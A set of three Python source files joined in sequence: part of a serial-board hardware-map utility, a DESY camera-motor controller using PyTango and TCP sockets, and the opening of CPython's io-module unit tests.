# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=yaml.FullLoader)
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product']:
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
screen_motor.py
|
# ----------------------------------------------------------------------
# Author: yury.matveev@desy.de
# ----------------------------------------------------------------------
"""Camera motor class
"""
import socket
import errno, time
import json
import logging
import PyTango
import threading
from io import StringIO
from queue import Queue, Empty
from petra_camera.main_window import APP_NAME
REFRESH_PERIOD = 1
logger = logging.getLogger(APP_NAME)
# ----------------------------------------------------------------------
class MotorExecutor(object):
SOCKET_TIMEOUT = 5
DATA_BUFFER_SIZE = 2 ** 22
def __init__(self, settings):
super(MotorExecutor, self).__init__()
self._my_name = settings.getAttribute("name")
if str(settings.getAttribute("motor_type")).lower() == 'acromag':
self._motor_type = 'Acromag'
server_name = str(settings.getAttribute("valve_tango_server"))
self._valve_device_proxy = PyTango.DeviceProxy(server_name)
if self._valve_device_proxy.state() == PyTango.DevState.FAULT:
raise RuntimeError(f'{server_name} in FAULT state!')
self._valve_channel = int(settings.getAttribute("valve_channel"))
logger.debug(f'{self._my_name}: new Acromag motor: {server_name}:{self._valve_channel}')
elif str(settings.getAttribute("motor_type")).lower() == 'fsbt':
self._motor_type = 'FSBT'
self._motor_name = str(settings.getAttribute("motor_name"))
self._fsbt_server = None
self._fsbt_host = str(settings.getAttribute("motor_host"))
self._fsbt_port = int(settings.getAttribute("motor_port"))
self._fsbt_worker = threading.Thread(target=self.server_connection)
self._fsbt_worker_status = 'running'
self._run_server = True
self._motor_position = None
self._move_queue = Queue()
self._fsbt_worker.start()
logger.debug(f'{self._my_name}: new FSBT motor: {self._motor_name}@{self._fsbt_host}:{self._fsbt_port}')
else:
raise RuntimeError('Unknown type of motor')
# ----------------------------------------------------------------------
def server_connection(self):
if not self.get_connection_to_fsbt():
self._fsbt_worker_status = 'stopped'
return
while self._run_server:
try:
status = self.send_command_to_fsbt('status ' + self._motor_name)
self._motor_position = status[1][self._motor_name] == 'in'
except Exception as err:
logger.error("Error during motor status {}...".format(err))
if not self.get_connection_to_fsbt():
break
try:
result = self.send_command_to_fsbt(self._move_queue.get(block=False))
if not result[0]:
logger.error("Cannot move motor")
except Empty:
pass
except Exception as err:
logger.error("Error during motor move {}...".format(err))
break
time.sleep(REFRESH_PERIOD)
self._fsbt_worker_status = 'stopped'
# ----------------------------------------------------------------------
def stop(self):
if self._motor_type == 'FSBT' and self._fsbt_worker_status != 'stopped':
while not self._move_queue.empty() and self._fsbt_worker_status != 'stopped':
logger.debug(f'{self._my_name}: need to finish motor command queue')
time.sleep(0.1)
self._run_server = False
while self._fsbt_worker_status != 'stopped':
time.sleep(0.1)
logger.debug(f'{self._my_name}: motor worker stopped')
# ----------------------------------------------------------------------
def motor_position(self):
if self._motor_type == 'Acromag':
_currentPos = list('{0:04b}'.format(int(self._valve_device_proxy.read_attribute("Register0").value)))
return _currentPos[3 - self._valve_channel] == "1"
elif self._motor_type == 'FSBT':
return self._motor_position
# ----------------------------------------------------------------------
def move_motor(self, new_state):
logger.debug(f'{self._my_name}: new move command {new_state}')
if self._motor_type == 'Acromag':
_currentPos = list('{0:04b}'.format(int(self._valve_device_proxy.read_attribute("Register0").value)))
current_state = _currentPos[3 - self._valve_channel] == "1"
if current_state != new_state:
if new_state:
_currentPos[3 - self._valve_channel] = "1"
else:
_currentPos[3 - self._valve_channel] = "0"
self._valve_device_proxy.write_attribute("Register0", int("".join(_currentPos), 2))
elif self._motor_type == 'FSBT':
if self._motor_position != new_state:
if new_state:
self._move_queue.put('in {:s}'.format(self._motor_name))
else:
self._move_queue.put('out {:s}'.format(self._motor_name))
else:
raise RuntimeError('Unknown type of motor')
# ----------------------------------------------------------------------
def get_connection_to_fsbt(self):
self._fsbt_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._fsbt_server.settimeout(self.SOCKET_TIMEOUT)
start_timeout = time.time()
time_out = False
is_connected = False
while not time_out and not is_connected:
err = self._fsbt_server.connect_ex((self._fsbt_host, self._fsbt_port))
if err == 0 or err == errno.EISCONN:
is_connected = True
if time.time() - start_timeout > self.SOCKET_TIMEOUT:
time_out = True
return is_connected
# ----------------------------------------------------------------------
def send_command_to_fsbt(self, command):
try:
self._fsbt_server.sendall(str(command).encode())
except Exception as err:
return
start_timeout = time.time()
time_out = False
got_answer = False
ans = ''
while not time_out and not got_answer:
try:
ans = str(self._fsbt_server.recv(self.DATA_BUFFER_SIZE).decode())
got_answer = True
except socket.error as err:
if err.errno != 11:
time_out = True
if time.time() - start_timeout > self.SOCKET_TIMEOUT:
time_out = True
if not time_out:
try:
ans = json.load(StringIO(ans))
except Exception as err:
ans = None
return ans
else:
raise RuntimeError("The FSBT server does not respond")
# ----------------------------------------------------------------------
def int_to_bin(self, val):
b = '{0:04b}'.format(val)
l = [0] * 4
for i in range(4):
l[i] = int(b[i], 2)
return l
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import import_helper
from test.support import os_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support import skip_if_sanitizer
from test.support.os_helper import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
requires_alarm = unittest.skipUnless(
hasattr(signal, "alarm"), "test requires signal.alarm()"
)
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
os_helper.unlink(os_helper.TESTFN)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb") as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w', encoding="utf-8")
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w', encoding="utf-8")
def test_raw_file_io(self):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(os_helper.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(os_helper.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(os_helper.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "a", encoding="utf-8") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with warnings_helper.check_warnings(('', ResourceWarning)):
f = MyFileIO(os_helper.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(os_helper.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'w',
encoding="utf-8", closefd=False)
def test_read_closed(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("egg\n")
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
file = self.open(f.fileno(), "r", encoding="utf-8", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(os_helper.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, os_helper.TESTFN, "r",
encoding="utf-8", closefd=False)
def test_closefd_attr(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", encoding="utf-8", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with warnings_helper.check_warnings(('', ResourceWarning)):
f = self.FileIO(os_helper.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(os_helper.TESTFN, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(os_helper.TESTFN, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(os_helper.TESTFN, 'w', encoding="utf-8")
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', encoding="utf-8")
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', encoding="utf-8", closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("egg\n")
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", encoding="utf-8", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
